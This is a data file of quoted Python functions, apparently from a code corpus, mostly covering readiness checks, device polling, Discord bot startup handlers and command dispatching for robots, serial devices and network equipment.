"def wait(self):\n\t\twhile True:\n\t\t\tr1 = self.zaberSend(self.translation[\"hor\"], self.cmd[\"returnStatus\"], data=0)\n\t\t\tr2 = self.zaberSend(self.translation[\"ver\"], self.cmd[\"returnStatus\"], data=0)\n\t\t\tif r1[2] == 0 and r2[2] == 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\ttime.sleep(.01)",
"async def _hw_init(self):\n await self._write_async(b\":XR\\r\") # Broadcast: initialize + execute\n # Note: no need to consume reply here because there is none (since we are using broadcast)",
"async def on_ready(self):\n if not hasattr(self.bot, 'uptime'):\n self.bot.uptime = datetime.utcnow()\n\n # Check if user desires to have something other than online\n status = config.STATUS_TYPE.lower()\n status_type = {\"idle\": discord.Status.idle, \"dnd\": discord.Status.dnd}\n\n # Check if user desires to have a different type of activity\n activity = config.ACTIVITY_TYPE.lower()\n activity_type = {\"listening\": 2, \"watching\": 3, \"competing\": 5}\n\n await self.bot.change_presence(\n activity=discord.Game(type=activity_type.get(activity, 0), name=config.ACTIVITY),\n status=status_type.get(status, discord.Status.online)\n )\n\n # Indicate that the bot has successfully booted up\n print(f'Ready: {self.bot.user} | Servers: {len(self.bot.guilds)}')",
"def run_commands(ip_address, user, password, commandList, platform, buffer=5000):\n print \"Configuring \" + ip_address\n remote_conn_pre = paramiko.SSHClient()\n remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n remote_conn_pre.connect(ip_address, username=user, password=password)\n remote_conn = remote_conn_pre.invoke_shell()\n if platform == \"cisco\":\n remote_conn.send(\"enable\\n\")\n time.sleep(1)\n remote_conn.send(password+'\\n')\n time.sleep(1)\n commands = commandList.split('\\n')\n for com in commands:\n remote_conn.send(com+'\\n')\n time.sleep(1)\n output = remote_conn.recv(buffer)\n #print output",
"def trigger_ready(self) -> None:\n self.trigger_signal(\"ready\")",
"def wait_for_server_ready(self, params):\n hub_client = QTask()\n hub_client.createBlindTask('ubqc', params)\n ret = hub_client.waitBlindTask(1)\n if ret is None:\n return False\n\n path, secret = ret\n self.entry = f\"{blindCompAddr}/{path}\"\n self.secret = secret\n\n return True",
"def _check_all_systems_ready(self):\n self.check_joint_states()\n self.check_contact_1()\n self.check_contact_2()\n self.check_collision()\n # self.check_rgb_camera()\n # self.check_rgbd_camera()\n # self.check_gripper_state()\n rospy.logdebug(\"ALL SYSTEMS READY\")",
"async def on_ready():\n # Sets bot's status\n await bot.change_presence(status=discord.Status.idle, activity=discord.Game('with your girlfriend ;)'))\n # Initial extensions to load.\n await ext_manager.load()\n\n print('Bot is ready.')",
"def ready(self):\n self.stdout.write('READY\\n')\n self.stdout.flush()",
"def __run_cmd(self, command, timeout, expected_result):\n if command.strip().lower().find(\"[sleep(\") != -1:\n command = command.strip().lower().replace(\"[sleep(\", \"\")\n command = command.replace(\")]\", \"\")\n sleep_time = float(command)\n time.sleep(sleep_time)\n status = Global.SUCCESS\n output = \"Success\"\n elif command.strip().lower().find(\"[usb_plug]\") != -1:\n if self._device is not None and self._io_card is not None:\n self._io_card.usb_host_pc_connector(True)\n self._device.connect_board()\n status = Global.SUCCESS\n output = \"Success\"\n else:\n self._logger.error(\"Cannot execute usb_plug, no io card configured.\")\n status = Global.FAILURE\n output = \"Cannot execute usb_plug, no io card configured.\"\n elif command.strip().lower().find(\"[usb_unplug]\") != -1:\n if self._device is not None and self._io_card is not None:\n self._device.disconnect_board()\n self._io_card.usb_host_pc_connector(False)\n status = Global.SUCCESS\n output = \"Success\"\n else:\n self._logger.error(\"Cannot execute usb_unplug, no io card configured.\")\n status = Global.FAILURE\n output = \"Cannot execute usb_unplug, no io card configured.\"\n elif command.strip().lower().find(\"[press_power_button(\") != -1:\n command = command.strip().lower().replace(\"[press_power_button(\", \"\")\n command = command.replace(\")]\", \"\")\n press_button_time = float(command)\n\n if self._io_card is not None:\n self._io_card.press_power_button(press_button_time)\n status = Global.SUCCESS\n output = \"Success\"\n else:\n self._logger.error(\"Cannot execute press_power_button, no io card configured.\")\n status = Global.FAILURE\n output = \"Cannot execute press_power_button, no io card configured.\"\n elif command.strip().lower().find(\"[control_relay(\") != -1:\n command = command.strip().lower().replace(\"[control_relay(\", \"\")\n command = command.replace(\")]\", \"\")\n relay_nbr = int(command.split(\",\")[0].strip())\n state = command.split(\",\")[1].strip().lower()\n\n if self._io_card is not None:\n if state == \"on\":\n self._io_card.enable_line(relay_nbr)\n elif state == \"off\":\n self._io_card.disable_line(relay_nbr)\n status = Global.SUCCESS\n output = \"Success\"\n else:\n self._logger.error(\"Cannot execute press_relay, no io card configured.\")\n status = Global.FAILURE\n output = \"Cannot execute press_relay, no io card configured.\"\n else:\n # Handle multi phone, if we issue adb command, add serial number if we have it\n if \"adb\" in command.lower():\n command = self._device.format_cmd(command)\n\n # If curlUtilities is called add the path to Campaign_report\n elif command.strip().lower().find(\"curlutilities\") != -1:\n # Add path to campaign report in CurlUtilities command\n report_tree = \\\n self._global_config.campaignConfig.get(\"campaignReportTree\")\n command += \\\n \" --output=%s\" % report_tree.get_report_path()\n\n if \"[MY_PATH]\" in command:\n command = command.replace(\"[MY_PATH]\",\n os.path.dirname(\n os.path.abspath(\n self._tc_parameters.get_file_path()))\n + os.sep)\n\n if \"[MY_DEVICE_MODEL]\" in command:\n command = command.replace(\"[MY_DEVICE_MODEL]\", self._device.get_phone_model())\n\n # We use the same python that ACS\n if \"python\" in command:\n command_list = command.split(\" \")\n # pyc replacement instead of py curently only works if RUN_FROM_TCDIRECTORY\n # is set to true\n if self._run_from_tc_directory:\n execution_path = os.path.join(self._execution_config_path,\n os.path.dirname(self._name))\n for index, command_element in enumerate(command_list):\n if command_element.endswith(\".py\"):\n if os.path.isfile(os.path.join(execution_path, command_element)) is False:\n pyc_cmd = command_element[:-2] + \"pyc\"\n if os.path.isfile(os.path.join(execution_path, pyc_cmd)):\n command_list[index] = pyc_cmd\n\n command = \" \".join(command_list)\n python_path = sys.executable\n command = command.replace(\"python\", python_path)\n self._logger.info(\"Using python: %s\" % python_path)\n\n if any(\"acs.py\" in cmd.lower() for cmd in command):\n # Put report into sub folder for analysis in case of error\n report_path = self._global_config.campaignConfig.get(\"campaignReportTree\").get_report_path()\n report_subfolder = os.path.join(report_path, os.path.basename(self._name))\n self._logger.info(\"Detailed results will be found at: {0}\".format(report_subfolder))\n command = \"{0} --report_folder={1}\".format(command, report_subfolder)\n\n status, _ = \\\n self.__internal_exec(command, timeout, expected_result)\n if status == Global.SUCCESS:\n output = \"Success\"\n else:\n output = \"Did not found expected result: {0}\".format(expected_result)\n\n else:\n status, stdout = \\\n self.__internal_exec(command, timeout, expected_result)\n output = \"output: {0}\".format(stdout.rstrip(\"\\r\\n\"))\n self._logger.info(output)\n\n # Remove special characters which could be stored in output message\n allowed_characters = '[^a-zA-Z0-9\\-\\+\\=\\'\\.\\:\\,\\;\\!\\?\\%\\(\\)\\#\\*\\@\\_\\n\\t]'\n parsed_output = re.sub(allowed_characters, ' ', output)\n\n return status, parsed_output",
"def setup_commands(bot):\n # Reset the bot's command setup\n bot.reset_commands()\n # Load enabled mods\n for mod in bot.enabled_mods:\n try:\n full = 'mod_%s' % mod\n m = getattr(__import__('mods.%s' % full), full)\n except Exception:\n bot.log(ERROR, 'Importing the %s mod failed!' % mod)\n sys.excepthook(*sys.exc_info())\n continue\n\n try:\n bot.installed_mods[mod] = m\n # Check for a 404 handler, and replace the current one if there is\n p404 = getattr(m, 'handle_404', None)\n if p404:\n bot.cb_404 = p404\n\n # Check for a setup function, and run it if there is\n setup = getattr(m, 'setup', None)\n if setup:\n setup(bot)\n\n # Required command bank\n for cmd in m.command_bank:\n # Get the actual function\n func = getattr(m, cmd)\n # Get the args for the command\n data = m.command_bank[cmd]\n # If data[0] is true, mod_help will recognize this command\n if data[0]:\n bot.help_db[data[1]] = parse_help(func)\n # Get the main name and aliases inserted\n for alias in data[1:]:\n bot.command_db[alias] = func\n\n # Helper function for optional nameless multiples\n def add_optional(olist, name):\n olist.extend(getattr(m, f) for f in getattr(m, name, ()))\n\n # Optional filters are loaded and added to the list\n add_optional(bot.filters, 'filters')\n\n # Ditto for time-cycle callbacks\n add_optional(bot.periodic_cbs, 'periodic')\n\n # Handlers are the same, but structured as a dict with\n # \"type\": \"single function-name\" items\n handlers = getattr(m, 'handlers', None)\n if handlers:\n for cbtype in handlers:\n bot.handlers[cbtype].append(getattr(m, handlers[cbtype]))\n\n # Register any requirements\n # NOTE: By putting this at the end, we avoid the possibility of\n # getting fake requires.\n reqs = getattr(m, 'requires', None)\n if reqs:\n bot.required_mods.update(reqs)\n except Exception:\n bot.log(ERROR, 'Unable to install the %s mod!' % mod)\n del bot.installed_mods[mod]\n sys.excepthook(*sys.exc_info())\n\n missing = bot.required_mods - set(bot.installed_mods)\n if missing:\n raise MissingRequirementsError(missing)\n\n # And now for the post-install triggers.\n for mod, m in bot.installed_mods.items():\n post = getattr(m, 'post_prepare', None)\n if post:\n try:\n post(bot)\n except Exception:\n bot.log(ERROR, 'Unable to post-prepare the %s mod!' % mod)\n sys.excepthook(*sys.exc_info())",
"def _check_all_systems_ready(self):\n for r in self.robots:\n r.joints = None\n while r.joints is None and not rospy.is_shutdown():\n try:\n r.joints = rospy.wait_for_message(\n r.ns + '/joint_states', JointState, timeout=3.0)\n except:\n rospy.logerr(\"Current /joint_states not ready yet.\\n\\\n Do you spawn the robot and launch ros_control?\")\n try:\n r.model_index = rospy.wait_for_message('/gazebo/model_states', ModelStates, 3).name.index(r.ns[1:])\n except rospy.exceptions.ROSException:\n rospy.logerr(\"Robot model does not exist.\")\n\n # rospy.logdebug(\"ALL SYSTEMS READY\")\n return True",
"def waitonwalk(pidevice, channels, timeout=300, predelay=0, postdelay=0, polldelay=0.1):\n if not isdeviceavailable([GCS2Commands, GCS21Commands], pidevice):\n raise TypeError('Type %s of pidevice is not supported!' % type(pidevice).__name__)\n\n channels = channels if isinstance(channels, (list, set, tuple)) else [channels]\n if not channels:\n return\n maxtime = time() + timeout\n waitonready(pidevice, timeout=timeout, predelay=predelay, polldelay=polldelay)\n while not all(list(x == 0 for x in list(pidevice.qOSN(channels).values()))):\n if time() > maxtime:\n stopall(pidevice)\n raise SystemError('waitonwalk() timed out after %.1f seconds' % timeout)\n sleep(polldelay)\n sleep(postdelay)",
"def _ready(cls):\n sync_call(cls.ready)",
"def initialize_ready_tasks(self):\n self._write_transaction(tx.set_runnable_tasks_to_ready)",
"def is_ready() -> bool:\n return True",
"def _wait_for_ready(self):\n while not self._ready_to_evict():\n if self._ready_waited > self._ready_timeout:\n raise ClusterTimeout()\n\n time.sleep(self.POLL_PERIOD)\n self._ready_waited += self.POLL_PERIOD\n\n self._mds_map = self._volume_client._rados_command(\"mds dump\", {})",
"def if_ready(self, **kwargs):\n return True",
"def _check_all_systems_ready(self):\n \n self._check_all_sensors_ready()\n #self._check_joint_states_ready()\n self._check_cmd_vel_pub()\n \n return True",
"def commands():\n # Check invalid command\n check50.run(run_command).stdin(\"cs50\").stdout(\"Invalid command.\")\n\n # Check for upper case abreviation\n try:\n check50.run(run_command).stdin(\"W\").stdout(room_2_description)\n except check50.Failure as error:\n raise check50.Failure(f\"Could not use abbreviation 'w' to move\")\n\n # Check for lower case abbreviation\n try:\n check50.run(run_command).stdin(\"w\").stdout(room_2_description)\n except check50.Failure as error:\n raise check50.Failure(f\"Could not use abbreviation 'w' to move\")",
"async def async_trigger_ready(self) -> None:\n await self.async_trigger_signal(\"ready\")",
"def getUARTFrameReady():\r\n serialRead()\r\n serialRead()",
"def wait_until_units_startup(timeout = '30', *units):\r\n not_ready_units = list(units)\r\n ready_units = []\r\n ping_time_interval = 10 # ping all units every 10 seconds\r\n time_is_up = int(timeout)\r\n\r\n while len(not_ready_units) != 0 and time_is_up > 0:\r\n start_ping_time = time.time() # get start ping time\r\n\r\n for unit in not_ready_units:\r\n ping_result = ping_remote_system(unit)\r\n if ping_result[0][2] == '0': # ping OK which means unit is ready\r\n ready_units.append(unit)\r\n\r\n # remove units which is already ping successfully\r\n for ready_unit in ready_units:\r\n try:\r\n not_ready_units.remove(ready_unit)\r\n except ValueError:\r\n pass\r\n ready_units = [] # empty the ready_units\r\n\r\n end_ping_time = time.time() # get end ping time\r\n consume_ping_time = int(end_ping_time - start_ping_time)\r\n time_is_up = time_is_up - consume_ping_time\r\n time.sleep(ping_time_interval)\r\n\r\n if len(not_ready_units) != 0: # still some units are not ready\r\n raise Exception, 'there are still some units (%s) not in working state' % not_ready_units",
"def commands():\n pass",
"def commands():\n pass",
"def commands():\n pass",
"def commands():\n pass",
"def _read_until(self, expected_cmds, adb_info):\n cmd, _, _, data = self._io_manager.read(expected_cmds, adb_info, allow_zeros=True)\n\n # Acknowledge write packets\n if cmd == constants.WRTE:\n self._okay(adb_info)\n\n return cmd, data",
"def HasPendingCommands(self):\n\t\n return self.queue.qsize() > 0",
"def setup_commands(self):\n return self.get_data(\"setup_commands\")",
"def _check_all_systems_ready(self):\n self._check_all_sensors_ready()\n return True",
"def _check_all_systems_ready(self):\n self._check_all_sensors_ready()\n return True",
"def _execute(self):\n LOG.info(\"Waiting for a message...\")",
"async def on_ready():\n # Set presence of bot\n await client.change_presence(status=discord.Status.online)\n change_status.start()\n\n # Checks for new / removed guilds after downtime\n guilds.check_guilds(client)\n\n # States, that the bot is ready\n print(\"{} is logged in as user {}\".format(appearance.bot_name, client.user.name))",
"def _command(self, commands):\n# \"\"\"Send command to spi bus of display chip, most DC pin need set to LOW \"\"\"\n# if self._spi == None: raise \"Do not setting SPI\"\n# GPIO.output( self._spi_dc, 0 )\n# self._spi.writebytes( commands )\n raise NotImplementedError",
"def set_wait_for_do_startup(self) -> MessageBoardBuilder:\n brd = get_message_board_builder()\n # set sdp master and sdp subarray to be waited before startup completes\n brd.set_waiting_on(self._tel.sdp.master).for_attribute(\"state\").to_become_equal_to(\n \"ON\", ignore_first=False\n )\n for index in range(1, self.nr_of_subarrays + 1):\n brd.set_waiting_on(self._tel.sdp.subarray(index)).for_attribute(\n \"state\"\n ).to_become_equal_to(\"ON\", ignore_first=False)\n # set csp controller and csp subarray to be waited\n # before startup completes\n brd.set_waiting_on(self._tel.csp.controller).for_attribute(\"state\").to_become_equal_to(\n \"ON\", ignore_first=False\n )\n for index in range(1, self.nr_of_subarrays + 1):\n brd.set_waiting_on(self._tel.csp.subarray(index)).for_attribute(\n \"state\"\n ).to_become_equal_to(\"ON\", ignore_first=False)\n # we wait for cbf vccs to be in proper initialised state\n if self._tel.skamid:\n brd.set_waiting_on(self._tel.csp.cbf.controller).for_attribute(\n \"reportVccState\"\n ).to_become_equal_to([\"[0, 0, 0, 0]\", \"[0 0 0 0]\"], ignore_first=False)\n # set dish master to be waited before startup completes\n if self._tel.skamid:\n for dish in self._tel.skamid.dishes(self.receptors):\n brd.set_waiting_on(dish).for_attribute(\"state\").to_become_equal_to(\n \"ON\", ignore_first=False\n )\n # set centralnode telescopeState waited before startup completes\n brd.set_waiting_on(self._tel.tm.central_node).for_attribute(\n \"telescopeState\"\n ).to_become_equal_to(\"ON\", ignore_first=False)\n return brd",
"def requestReady(self):\n if self.team[self.team_num][self.map_pos].avatarLabel['text'] == \"\":\n return;\n \n if self.isHost:\n obj = {\"worldName\":self.worldInfo.worldName}\n main.cManager.sendRequest(Constants.CMSG_START_TO_READY_GAME, obj)\n \n else:\n obj ={\"worldName\": self.worldInfo.worldName}\n main.cManager.sendRequest(Constants.CMSG_READY, obj)\n self.isReady = 1",
"async def on_ready():\n print(f'{bot.user} has connected!')\n try:\n await pull_prev_info()\n except Exception as e:\n print(\"Error in starting function with pulling previous information:\")\n print(e)\n\n try:\n await update_tournament_list()\n except Exception as e:\n print(\"Error in starting function with updating tournament list:\")\n print(e)\n\n try:\n refresh_sheet.start()\n except Exception as e:\n print(\"Error in starting function with updating tournament list:\")\n print(e)\n\n post_something.start()\n cron.start()\n go_stylist.start()\n manage_welcome.start()\n store_variables.start()\n change_bot_status.start()\n update_member_count.start()",
"async def _command_dispatcher(self):\n # sysex commands are assembled into this list for processing\n #checkingport = self.serial_port.com_port\n logstring(\"Starting Command Dispatcher\")\n sysex = []\n while True:\n if self._valid_target_exists:\n #logstring(\"Command Dispatcher: Valid Target\")\n try:\n #logstring(\"Command Dispatcher: Reading Next Byte\")\n #donothing = self.donothingatall()\n #logstring(\"Command Dispatcher: didnothingatall\")\n next_command_byte = await self.read_next_byte()\n #logstring(\"Command Dispatcher: Next Byte Read {}\".format(next_command_byte))\n # if this is a SYSEX command, then assemble the entire\n # command process it\n if next_command_byte == PrivateConstants.START_SYSEX:\n while next_command_byte != PrivateConstants.END_SYSEX:\n # because self. is awaited, i think we can remove this sleep, and the next\n #await asyncio.sleep(self.sleep_tune)\n next_command_byte = await self.read_next_byte()\n sysex.append(next_command_byte)\n await self.command_dictionary[sysex[0]](sysex)\n sysex = []\n await asyncio.sleep(self.sleep_tune)\n # if this is an analog message, process it.\n elif 0xE0 <= next_command_byte <= 0xEF:\n # analog message\n # assemble the entire analog message in command\n command = []\n # get the pin number for the message\n pin = next_command_byte & 0x0f\n command.append(pin)\n # get the next 2 bytes for the command\n command = await self._wait_for_data(command, 2)\n # process the analog message\n logstring(\"Analog Message received {}\".format(command))\n await self._analog_message(command)\n # handle the digital message\n elif 0x90 <= next_command_byte <= 0x9F:\n command = []\n port = next_command_byte & 0x0f\n command.append(port)\n command = await self._wait_for_data(command, 2)\n await self._digital_message(command)\n # handle all other messages by looking them up in the\n # command dictionary\n elif next_command_byte in self.command_dictionary:\n await self.command_dictionary[next_command_byte]()\n await asyncio.sleep(self.sleep_tune)\n else:\n # we need to yield back to the loop\n await asyncio.sleep(self.sleep_tune)\n continue\n #logstring(\"finished this read cycle\")\n except ConnectionAbortedError as ex:\n logstring(ex)\n #print(\"An exception occurred on the asyncio event loop while receiving data. Invalid message.\")\n else:\n await asyncio.sleep(0.01)",
"def execute(self, devices, command_bytes):",
"def set_ready(self, timeout=None):\r\n\r\n # Send a message to the server, and wait for confirmation of receipt.\r\n success, reply = self._wait_for_reply(cb.CLIENTREADY, \\\r\n cb.CLIENTGOGOGO, timeout=timeout)\r\n \r\n return success",
"def check_ready(self, throw_error=True):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tcfg = self.cfg\n\t\tself.log('PHASE: check_ready', level=logging.DEBUG)\n\t\terrs = []\n\t\tself.pause_point('\\nNow checking whether we are ready to build modules configured to be built', print_input=False, level=3)\n\t\t# Find out who we are to see whether we need to log in and out or not.\n\t\tfor module_id in self.module_ids():\n\t\t\tmodule = self.shutit_map[module_id]\n\t\t\tself.log('considering check_ready (is it ready to be built?): ' + module_id, level=logging.DEBUG)\n\t\t\tif cfg[module_id]['shutit.core.module.build'] and module.module_id not in self.get_current_shutit_pexpect_session_environment().modules_ready and not self.is_installed(module):\n\t\t\t\tself.log('checking whether module is ready to build: ' + module_id, level=logging.DEBUG)\n\t\t\t\tself.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\t# Move to the correct directory (eg for checking for the existence of files needed for build)\n\t\t\t\trevert_dir = os.getcwd()\n\t\t\t\tself.get_current_shutit_pexpect_session_environment().module_root_dir = os.path.dirname(self.shutit_file_map[module_id])\n\t\t\t\tself.chdir(self.get_current_shutit_pexpect_session_environment().module_root_dir)\n\t\t\t\tif not self.is_ready(module) and throw_error:\n\t\t\t\t\terrs.append((module_id + ' not ready to install.\\nRead the check_ready function in the module,\\nor log messages above to determine the issue.\\n\\n', self.get_shutit_pexpect_session_from_id('target_child')))\n\t\t\t\tself.logout(echo=False)\n\t\t\t\tself.chdir(revert_dir)\n\t\treturn errs",
"def boot(self):\n\t\tmesslen, received = self.socket.send('bootm\\r', 25)\t\t\n\t\treturn None",
"def isReady(self):\n\t\twhile self.osc.trigger_state() != \"save\":\n\t\t\ttime.sleep(.1)\n\t\treturn True",
"def check_ready(self):\r\n print \"Checking ready\"\r\n\t\tif self.game.trough.is_full():\r\n print \"Ready\"\r\n\t\t\tself.ready()\r\n\t\t\treturn True\r\n\t\tprint \"Not Ready\"\r\n\t\treturn False",
"def _WaitForUSBDevice(self, name, vendor_id, product_id, timeout=10):\n self._out.Progress('Waiting for board to appear on USB bus')\n start_time = time.time()\n while time.time() - start_time < timeout:\n try:\n args = ['-d', '%04x:%04x' % (vendor_id, product_id)]\n self._tools.Run('lsusb', args, sudo=True)\n self._out.Progress('Found %s board' % name)\n return True\n\n except CmdError:\n pass\n\n return False",
"def test_command_finds_commands(self):\r\n COMMANDLIST['!toread'] = lambda bmark: bmark\r\n\r\n bm = BmarkMock()\r\n bm.tags['!toread'] = True\r\n commander = Commander(bm)\r\n commander.build_commands()\r\n\r\n self.assertTrue(\r\n '!toread' in commander.commands,\r\n \"Our commander should find !toread command to run\")",
"def test_device_command_list(self):\n default_cmds = helper_module.DEFAULT_TANGO_DEVICE_COMMANDS\n actual_device_cmds = set(self.sim_device.get_command_list()) - default_cmds\n expected_cmd_list = self.sim_file_parser.get_device_command_metadata().keys()\n self.assertEquals(\n actual_device_cmds,\n set(expected_cmd_list),\n \"The commands specified in the json file are not present in\" \" the device\",\n )",
"def _check_all_sensors_ready(self):\n \n self._check_dist_ready()\n self._check_angle_ready()\n self._check_odom_ready()\n self._check_distsb_ready()\n self._check_anglesb_ready()\n \n return True",
"def default_supported_commands(self, commands):\n self.state.default_supported_commands(commands)",
"def __init__(self, commands: dict):\n self.__commands = commands\n\n # Wait times (s).\n self.WT_PIN_TOGGLE = 0.2\n self.WT_STATE_LOOKUP = 0.1\n\n # GPIO pins.\n self.RST_PIN = 17\n self.DC_PIN = 25\n self.CS_PIN = 8\n self.BUSY_PIN = 24\n\n # Set GPIO pins.\n RPi.GPIO.setmode(RPi.GPIO.BCM)\n RPi.GPIO.setwarnings(False)\n RPi.GPIO.setup(self.RST_PIN, RPi.GPIO.OUT)\n RPi.GPIO.setup(self.DC_PIN, RPi.GPIO.OUT)\n RPi.GPIO.setup(self.CS_PIN, RPi.GPIO.OUT)\n RPi.GPIO.setup(self.BUSY_PIN, RPi.GPIO.IN)\n\n # SPI device.\n self.__spi = spidev.SpiDev(0, 0)\n\n # Set SPI device.\n self.__spi.max_speed_hz = 2000000\n self.__spi.mode = 0b00",
"def initialize_commands(self) -> None:\n\n @self.command(name=\"snr\")\n @logger(\"all\")\n async def snr(ctx, *args):\n await ctx.message.channel.send(str(indie_seq.Seq([int(k) for k in args]).f()))\n\n @self.command(name=\"oeis\")\n @logger(\"all\")\n async def oeis(ctx, *args):\n global oeis_in_progress\n if not oeis_in_progress:\n oeis_in_progress = True\n if len(args) > 0:\n await ctx.message.channel.send(indie_oeis.get_sequence_from_b_file(args[0]))\n else:\n await ctx.message.channel.send(indie_oeis.get_sequence_from_b_file(str(random.randint(1, 341962))))\n oeis_in_progress = False\n else:\n await ctx.message.add_reaction(\"❌\")\n\n @self.command(name=\"collatz\")\n @logger(\"all\")\n async def collatz(ctx, *args):\n num = int(args[0])\n inity = \"\" if len(args) < 2 else args[1]\n\n collatz_results = indie_collatz.collatz_info(num)\n if len(inity) == 1:\n if inity == \"e\":\n await ctx.message.channel.send(f\"Evenity trajectory of {num}: {collatz_results.evenity_trajectory}\")\n elif inity == \"o\":\n await ctx.message.channel.send(f\"Oddinity trajectory of {num}: {collatz_results.oddinity_trajectory}\")\n else:\n await ctx.message.channel.send(f\"Collatz trajectory of {num}: {collatz_results.collatz_trajectory}\")\n\n @self.group(name=\"pig\")\n @logger(\"pig-math\")\n async def pig(ctx, *args):\n if ctx.invoked_subcommand is None:\n await ctx.message.add_reaction(\"❌\")\n\n def get_user_id_from_mention(user_id):\n user_id = user_id.replace(\"<\", \"\")\n user_id = user_id.replace(\">\", \"\")\n user_id = user_id.replace(\"@\", \"\")\n user_id = user_id.replace(\"!\", \"\")\n return user_id\n\n # Pig Math commands\n\n @pig.command(name=\"challenge\")\n @logger(\"pig-math\")\n async def pig_challenge(ctx, *args):\n challengee = get_user_id_from_mention(args[1])\n challengee = (await self.fetch_user(challengee)).name\n if len(args) > 2:\n point_target = int(args[2])\n else:\n point_target = 100\n pig_challenge = indie_pig.PigChallenge.create_challenge(ctx.message.author.name, challengee, point_target)\n await ctx.message.channel.send(pig_challenge.status)\n\n @pig.command(name=\"accept\")\n @logger(\"pig-math\")\n async def pig_accept(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigChallenge.accept_challenge(ctx.message.author.name))\n\n @pig.command(name=\"reject\")\n @logger(\"pig-math\")\n async def pig_reject(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigChallenge.reject_challenge(ctx.message.author.name))\n\n @pig.command(name=\"roll\")\n @logger(\"pig-math\")\n async def pig_roll(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigGame.play(ctx.message.author.name, \"roll\"))\n\n @pig.command(name=\"bank\")\n @logger(\"pig-math\")\n async def pig_bank(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigGame.play(ctx.message.author.name, \"bank\"))\n\n @pig.command(name=\"score\")\n @logger(\"pig-math\")\n async def pig_score(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigGame.play(ctx.message.author.name, \"score\"))\n\n @pig.command(name=\"quit\")\n @logger(\"pig-math\")\n async def pig_quit(ctx, *args):\n await ctx.message.channel.send(indie_pig.PigGame.play(ctx.message.author.name, \"quit\"))\n\n @self.command(name=\"save\")\n @logger(\"modonly\")\n async def save(ctx, *args):\n self.save_data_files()\n await ctx.message.channel.send(\"Saved.\")\n\n @self.command(name=\"balance\")\n @logger(\"all\")\n async def balance(ctx, *args):\n bals = self.data[\"balances.json\"]\n user = ctx.message.author.id\n bal = 0\n if user in bals:\n bal = bals[user]\n else:\n bals[user] = 0 \n await ctx.message.channel.send(ctx.message.author.name+\", your balance is \"+str(bal)+\".\")\n\n @self.command(name=\"credit\")\n @logger(\"modonly\")\n async def credit(ctx, *args):\n \"\"\"\n Command with credit users mentioned with first float arg detected\n \"\"\"\n users_mentioned = ctx.message.mentions\n user_mention = ctx.author.mention\n credit = 0\n for arg in args:\n try:\n credit = float(arg)\n await ctx.message.channel.send(user_mention+\", we have successfully debited as you commanded.\")\n break\n except:\n pass\n bals = self.data[\"balances.json\"]\n for user in users_mentioned:\n if user.id in bals:\n bals[user.id] += credit\n else:\n bals[user.id] = credit\n\n @self.command(name=\"debit\")\n @logger(\"modonly\")\n async def debit(ctx, *args):\n \"\"\"\n Command with credit users mentioned with first float arg detected\n \"\"\"\n users_mentioned = ctx.message.mentions\n user_mention = ctx.author.mention\n debit = 0\n for arg in args:\n try:\n debit = float(arg)\n await ctx.message.channel.send(user_mention+\", we have successfully debited as you commanded.\")\n break\n except:\n pass\n bals = self.data[\"balances.json\"]\n for user in users_mentioned:\n if user.id in bals:\n bals[user.id] -= debit\n else:\n bals[user.id] = -debit\n\n @self.command(name=\"register\")\n @logger(\"all\")\n async def register(ctx, *args):\n \"\"\"\n This command will trigger a check if the user is registered,\n if not, the bot will ask them to review the terms and conditions and accept,\n if they accept, the bot will consider them registered\n \"\"\"\n user = ctx.message.author\n user_mention = ctx.author.mention\n chan_mention = \"<#876850365730021386>\"\n \n if user in self.data[\"users.json\"]:\n await ctx.message.channel.send(user_mention+\", you are already registered. :blue_heart:\")\n else:\n self.data[\"users_asked_to_be_registered.json\"].append(user)\n await ctx.message.channel.send(user_mention+\", do you accept the \"+chan_mention+\n \" (Indie Library Terms of Service). Command .accept if you do. :blue_heart:\")\n \n @self.command(name=\"accept\")\n @logger(\"all\")\n async def accept(ctx, *args):\n \"\"\"\n This command will trigger a check if the user has asked to be registered.\n If they have, then calling this triggers adding them to registered users.\n If they have not, they will be asked to type .register first.\n \"\"\"\n user = ctx.message.author\n user_mention = \"<@\"+str(user.id)+\">\"\n\n if user in self.data[\"users_asked_to_be_registered.json\"]:\n self.data[\"users.json\"].append(user)\n self.data[\"users_asked_to_be_registered.json\"].remove(user)\n await ctx.message.channel.send(user_mention+\", you have been successfully registered. :blue_heart:\")\n else:\n await ctx.message.channel.send(user_mention+\", have not commanded .register yet. \"\n \"Please do so first. :blue_heart:\")",
"def _notify_comm_ready(self, comm):\n self.remote_call(\n comm_id=comm.comm_id,\n callback=self._comm_ready_callback\n )._comm_ready()",
"def send_commands(self, commands=None):\n commands = commands or []\n command_list = {}\n for command in commands:\n command_list[command.id] = {\n 'speed': command.speed, 'direction': command.direction\n }\n data = {'commands': command_list}\n state = self._post(data)\n status = state['status'].lower()\n print(\"status: {}\".format(status))\n if status == 'error':\n print(\"message: {}\".format(state['message']))\n elif status == 'finished':\n print(\"finished! Score: {} Watch result at: {}\".format(state['score'], state['visualization']))\n if 'requests' not in state:\n state['requests'] = []\n for elevator_data in state.get('elevators', []):\n if 'buttons_pressed' not in elevator_data:\n elevator_data['buttons_pressed'] = []\n\n return state",
"def get_available_commands(self, caller):\n # commands = [{\"name\":\"LOOK\", \"cmd\":\"look\", \"args\":self.dbref}]\n commands = [{\"name\":\"LOOT\", \"cmd\":\"loot\", \"args\":self.dbref}]\n return commands",
"def fillAdminReq():\n commands = os.listdir(adminDir)\n \n for el in commands:\n print 'Processing command ' + el\n if el == 'Turn_Tray.command':\n ser.write('T')\n ser.write('1')\n response = ser.read()\n print 'Arduino responded with ' + response\n elif el == 'Mix_Drink.command':\n ser.write('M')\n response = ser.read()\n print 'Arduino responded with ' + response\n elif el == 'Dispense_Drink_A.command':\n ser.write('A')\n response = ser.read()\n print 'Arduino responded with ' + response\n elif el == 'Dispense_Drink_B.command':\n ser.write('B')\n response = ser.read()\n print 'Arduino responded with ' + response\n else:\n print 'Command Unknown'\n\n os.remove(adminDir + '/' + el)",
